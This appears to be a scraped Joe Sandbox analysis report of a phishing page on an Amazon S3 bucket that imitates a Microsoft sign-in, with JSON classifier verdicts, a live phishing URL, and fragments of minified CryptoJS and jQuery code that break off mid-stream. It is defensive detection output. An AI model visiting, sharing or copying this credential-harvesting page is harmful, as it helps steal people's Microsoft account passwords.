Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}());return new l.init(e,t)}}),s=t.enc={},c=s.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new l.init(r,e/2)}},a=s.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new l.init(r,e)}},f=s.Utf8={stringify:function(t){try{return decodeURIComponent(escape(a.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return a.parse(unescape(encodeURIComponent(t)))}},d=n.BufferedBlockAlgorithm=o.extend({reset:function(){this._data=new l.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(i,a);e=i.splice(0,c),r.sigBytes-=n}return new l.init(e,n)},clone:function(){var t=o.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),u=(n.Hasher=d.extend({cfg:o.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){d.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new 
r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t, |
URL: https://empressachkaortshe.s3.ap-northeast-2.amazonaws.com/myway%23ch2%23364cm%23274%23923%232740%23274%2323%23264%232947%232047%23247%23kolpa%23274%23274%239374%23hcam%2364%2373%23264%233583%23mklopa%23264%23m4%2358bmi6%2324series4%237294.html Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone, or Skype"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://empressachkaortshe.s3.ap-northeast-2.amazonaws.com/myway%23ch2%23364cm%23274%23923%232740%23274%2323%23264%232947%232047%23247%23kolpa%23274%23274%239374%23hcam%2364%2373%23264%233583%23mklopa%23264%23m4%2358bmi6%2324series4%237294.html Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://empressachkaortshe.s3.ap-northeast-2.amazonaws.com/myway%23ch2%23364cm%23274%23923%232740%23274%2323%23264%232947%232047%23247%23kolpa%23274%23274%239374%23hcam%2364%2373%23264%233583%23mklopa%23264%23m4%2358bmi6%2324series4%237294.html Model: Joe Sandbox AI | { "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is a well-known global technology company.", "The URL 'empressachkaortshe.s3.ap-northeast-2.amazonaws.com' does not match the legitimate domain 'microsoft.com'.", "The URL is hosted on an Amazon S3 bucket, which is a common tactic used in phishing to host malicious content.", "The domain does not contain any direct reference to 'Microsoft', which is suspicious.", "The presence of input fields for 'Email, phone, or Skype' is typical for phishing attempts targeting Microsoft accounts." ], "riskscore": 9}
Google indexed: False |
URL: empressachkaortshe.s3.ap-northeast-2.amazonaws.com
Brands: Microsoft
Input Fields: Email, phone, or Skype |
URL: https://code.jquery.com/jquery-3.6.0.min.js... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "The provided JavaScript snippet is a part of the jQuery library, which is a widely used and reputable open-source library for DOM manipulation and event handling. The code does not exhibit any high-risk or moderate-risk behaviors such as dynamic code execution, data exfiltration, or redirects to suspicious domains. It primarily consists of utility functions and object manipulations typical of a library. There are no interactions with external domains or obfuscated code present. Therefore, it is considered low risk."
} |
/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.6.0",S=function(e,t){return new S.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}S.fn=S.prototype={jquery:f,constructor:S,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return 
this.prevObject||this.constructor()},push:u,sort:t.sort,splice:t.splice},S.extend=S.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||m(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(S.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||S.isPlainObject(n)?n:{},i=!1,a[t]=S.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},S.extend({expando:"jQuery"+(f+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(p(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,o=0,a=[];if(p(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&a.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&a.push(i);return g(a)},guid:1,support:y}),"function"==typeof Symbol&&(S.fn[Symbol.iterator]=t[Symbol.iterator]),S.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){n["[object "+t+"]"]=t.toLowerCase()});var d=function(n){var e,d,b,o,i,h,f,g,w,u,l,T,C,a,E,v,s,c,y,S="s |
URL: https://empressachkaortshe.s3.ap-northeast-2.amazonaws.com/myway%23ch2%23364cm%23274%23923%232740%23274%2323%23264%232947%232047%23247%23kolpa%23274%23274%239374%23hcam%2364%2373%23264%233583%23mklopa%23264%23m4%2358bmi6%2324series4%237294.html Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Your account or password is incorrect. If you can't re member your password, reset it now.",
"prominent_button_name": "Sign in",
"text_input_field_labels": [
"Password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": true,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://empressachkaortshe.s3.ap-northeast-2.amazonaws.com/myway%23ch2%23364cm%23274%23923%232740%23274%2323%23264%232947%232047%23247%23kolpa%23274%23274%239374%23hcam%2364%2373%23264%233583%23mklopa%23264%23m4%2358bmi6%2324series4%237294.html Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|